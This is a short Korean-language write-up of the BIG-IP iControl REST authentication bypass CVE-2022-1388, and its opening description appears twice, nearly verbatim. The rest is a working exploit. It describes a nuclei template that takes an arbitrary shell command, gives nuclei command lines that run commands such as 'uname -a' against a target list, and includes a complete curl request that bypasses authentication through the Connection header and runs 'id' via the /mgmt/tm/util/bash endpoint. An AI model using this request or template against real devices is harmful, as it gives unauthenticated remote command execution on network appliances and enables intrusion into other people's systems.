
CVE-2022-1388은 CVSSv3 점수 9.8을 받은 BIG-IP의 iControl API REST 구성 요소의 인증 우회 취약점입니다. iControl REST API는 BIG-IP 장치의 관리 및 구성에 사용됩니다. CVE-2022-1388은 BIG-IP를 사용하는 장치의 관리 포트 또는 자체 IP 주소에 네트워크로 접근할 수 있는 인증되지 않은 공격자에 의해 악용될 수 있습니다. 악용에 성공하면 공격자는 임의의 시스템 명령을 실행하고, 파일을 생성·삭제하며, 서비스를 비활성화할 수 있습니다.
CVE-2022-1388은 BIG-IP iControl API의 REST 구성 요소에 대한 인증 우회 취약점으로, CVSSv3 점수 9.8을 부여받았습니다. iControl REST API는 BIG-IP 장치의 관리 및 구성에 사용됩니다. CVE-2022-1388은 BIG-IP를 사용하는 장치의 관리 포트 또는 자체 IP 주소에 네트워크 접근 권한이 있는 인증되지 않은 공격자에 의해 악용될 수 있습니다. 악용에 성공하면 공격자는 임의의 시스템 명령을 실행하고, 파일을 생성·삭제하며, 서비스를 비활성화할 수 있습니다.
이 nuclei 템플릿은 악용을 위해 셸 매개변수를 허용합니다. 우리는 다른 워크플로우 또는 수동 검색에서 얻은 토큰을 테스트하고자 nuclei의 CLI 변수 기능을 사용하여 실행 시 단일 토큰 값 또는 토큰 목록을 이 템플릿에 동적으로 전달했습니다.
-V, -var value var=value 형식의 사용자 지정 변수
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'